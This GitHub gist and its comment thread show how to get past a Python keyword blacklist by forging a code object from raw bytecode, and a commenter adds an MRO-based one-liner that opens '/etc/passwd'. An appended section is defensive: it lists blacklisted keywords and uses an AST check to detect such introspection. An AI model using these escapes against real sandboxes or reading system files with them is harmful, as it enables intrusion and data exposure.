```python
'''
A simple demonstration of obtaining, modifying and executing code objects in python without relying
on commonly blocked keywords such as exec, compile, etc...
-Patrick Biernat.
'''
import __builtin__

# Globals for the forged function: only __builtins__ is supplied, so the
# code object below resolves 'open' through it.
mydict = {}
mydict['__builtins__'] = __builtin__

def f():
    pass

def mkfunc():
    function = type(f)          # types.FunctionType, without naming the types module
    code = type(f.__code__)     # types.CodeType
    # CPython 2.7 opcodes, equivalent to: open(filename, 'r').read()
    #   LOAD_GLOBAL 0 (open); LOAD_CONST 1 (filename); LOAD_CONST 2 ('r');
    #   CALL_FUNCTION 2; LOAD_ATTR 1 (read); CALL_FUNCTION 0; RETURN_VALUE
    # Opcode numbers differ between CPython releases, so this string is 2.7-specific.
    bytecode = "7400006401006402008302006a010083000053".decode('hex')
    filename = "./poc.py"
    consts = (None, filename, 'r')   # indexed by LOAD_CONST
    names = ('open', 'read')         # indexed by LOAD_GLOBAL / LOAD_ATTR
    # code(argcount, nlocals, stacksize, flags, codestring, constants, names,
    #      varnames, filename, name, firstlineno, lnotab, freevars, cellvars)
    codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())
    return function(codeobj, mydict, None, None, None)

g = mkfunc()
print g()
```
wangst321 commented Sep 17, 2014

I have to change the content of bytecode on my machine, in order to make it work.
bytecode = "74000064010064020083020069010083000053"

or segmentation fault

freddyb commented Jul 28, 2015

What kind of blacklist did you try to evade, @pbiernat?

I was wondering if an exploit that uses the method resolution order could be used as well.

TLDR:

(t for t in (42).__class__.__base__.__subclasses__() if t.__name__ == 'file').next()('/etc/passwd').read()
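An added example, not part of the gist or of either comment, that shows in Python 3 why a keyword blacklist of the kind the gist bypasses is not a meaningful control, and what a source-level check has to look at instead. It contrasts a naive substring filter with a walk over the parsed AST that flags the dunder attributes the gist's code-object construction and the MRO trick from the comment above both depend on. The three sample sources are constructed for this demonstration; they are only parsed, never executed, and the gist-like one has its opcode bytes and `code()` argument list elided.

```python
import ast

# Constructed sample sources. They are only parsed by the checks below and
# are never executed. POC_LIKE mirrors the structure of the gist in Python 3
# syntax with the opcode bytes and the code() argument list elided.
POC_LIKE = '''
import builtins
mydict = {}
mydict['__builtins__'] = builtins
def f():
    pass
def mkfunc():
    function = type(f)
    code = type(f.__code__)
    bytecode = b"<opcodes elided>"
    consts = (None, "./poc.py", "r")
    names = ("open", "read")
    codeobj = code(...)  # argument list elided
    return function(codeobj, mydict)
'''

# The method-resolution-order trick from the comment, verbatim.
MRO_LIKE = ("(t for t in (42).__class__.__base__.__subclasses__() "
            "if t.__name__ == 'file').next()('/etc/passwd').read()")

# Ordinary code that should pass both checks.
BENIGN = '''
def mean(xs):
    return sum(xs) / len(xs) if xs else 0.0
print(mean([1, 2, 3]))
'''

# A substring blacklist of the kind the gist is written to get past.
KEYWORD_BLACKLIST = ("exec", "eval", "compile", "__import__", "import os", "subprocess")

def keyword_blacklist_hits(src):
    """Return the blacklisted substrings present in src (naive filter)."""
    return [kw for kw in KEYWORD_BLACKLIST if kw in src]

# Attribute names and builtins that let code reach code objects, builtins
# or the class hierarchy without using any blacklisted keyword.
INTROSPECTION_ATTRS = frozenset({
    "__code__", "__class__", "__base__", "__bases__", "__mro__",
    "__subclasses__", "__builtins__", "__globals__", "__dict__", "__func__",
})
INTROSPECTION_CALLS = frozenset({"type", "getattr", "setattr", "vars", "globals", "locals"})

def ast_findings(src):
    """Walk the parsed source and report introspection a substring filter
    cannot see: dunder attribute access, the same names used as string keys
    (d['__builtins__'], getattr(o, '__code__')), and type()/getattr()-style calls."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Attribute) and node.attr in INTROSPECTION_ATTRS:
            findings.append((node.lineno, "attribute ." + node.attr))
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and node.value in INTROSPECTION_ATTRS):
            findings.append((node.lineno, "string %r" % node.value))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id in INTROSPECTION_CALLS):
            findings.append((node.lineno, "call " + node.func.id + "()"))
    return sorted(findings)

def assess(src):
    """Run both checks on one source string and return their results side by side."""
    return {"blacklist_hits": keyword_blacklist_hits(src),
            "ast_findings": ast_findings(src)}

if __name__ == "__main__":
    for label, src in (("gist-like", POC_LIKE), ("mro-trick", MRO_LIKE), ("benign", BENIGN)):
        print(label, assess(src))
```

Both sample payloads pass the substring filter with zero hits, while the AST walk reports `.__code__`, the `'__builtins__'` key and the `type()` calls for the gist-shaped source, and `.__class__`, `.__base__` and `.__subclasses__` for the MRO trick. An AST heuristic like this still only raises the bar (it can be defeated by indirection through `getattr` with computed strings, which is why those builtins are flagged too); the dependable mitigation is to run untrusted code in a separate process with OS-level isolation rather than to filter its source text.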